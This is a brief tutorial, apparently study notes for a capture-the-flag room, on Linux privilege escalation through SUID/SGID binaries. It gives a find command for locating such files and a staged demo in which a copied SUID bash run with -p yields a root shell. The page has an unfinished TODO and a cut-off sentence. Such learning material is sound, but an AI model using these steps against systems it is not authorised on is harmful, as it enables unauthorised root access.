Exploiting SUID/GUID Files

Table of Contents

• Finding and Exploiting SUID Files
• What is an SUID binary?
• Finding SUID Binaries
• Exploitation Examples
• Resources

Finding and Exploiting SUID Files

The first step in Linux privilege escalation exploitation is to check for files with the SUID/GUID bit set. This means that the file or files can be run with the permissions of the file(s) owner/group. In this case, as the super-user. We can leverage this to get a shell with these privileges!

What is an SUID binary?

As we all know in Linux everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read/write/execute. So when you set permission for any file, you should be aware of the Linux users to whom you allow or restrict all three permissions. Take a look at the following demonstration of how maximum privileges (rwx-rwx-rwx) look:

• r = read
• w = write
• x = execute

user	group	other
rwx	rwx	rwx
421	421	421

The maximum number of bit that can be used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set permissions using chmod as 755, then it will be: rwxr-xr-x.

But when special permission is given to each user it becomes SUID or SGID. When extra bit 4 is set to user(Owner) it becomes SUID (Set user ID) and when bit 2 is set to group it becomes SGID (Set Group ID).

Therefore, the permissions to look for when looking for SUID is:

• SUID: rws-rwx-rwx
• GUID: rwx-rws-rwx

Finding SUID Binaries

We already know that there is SUID capable files on the system, thanks to our LinEnum scan. However, if we want to do this manually we can use the command: find / -perm -u=s -type f 2>/dev/null to search the file system for SUID/GUID files. Let's break down this command.

• find - Initiates the "find" command
• / - Searches the whole file system
• -perm - searches for files with specific permissions
• -u=s - Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form
• -type f - Only search for files
• 2>/dev/null - Suppresses errors. As without this we will get a lot of

Exploitation Examples

TODO: Find a good example!

For example in this configuration test as root user I have f*cked up the thing on purpose, for illustrating. By copying bash to a temporary location and set SUID and GUID bit:

# whereis bash
bash: /bin/bash /etc/bash.bashrc /usr/share/man/man1/bash.1.gz
# ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.1M Apr  4  2018 /bin/bash
# cp /bin/bash /tmp/
# chmod ug+s /tmp/bash
# ls -lah /tmp/bash
-rwsr-sr-x 1 root root 1.1M Aug 19 08:29 /tmp/bash

Now as simple user executing this copied bash with preserving (-p) the rights to gain root access:

user8@polobox:~$ /tmp/bash -p
bash-4.4# whoami
root
bash-4.4# id
uid=1007(user8) gid=1007(user8) euid=0(root) egid=0(root) groups=0(root),1007(user8)
bash-4.4#

Resources

• https://tryhackme.com/room/commonlinuxprivesc
• https://gtfobins.github.io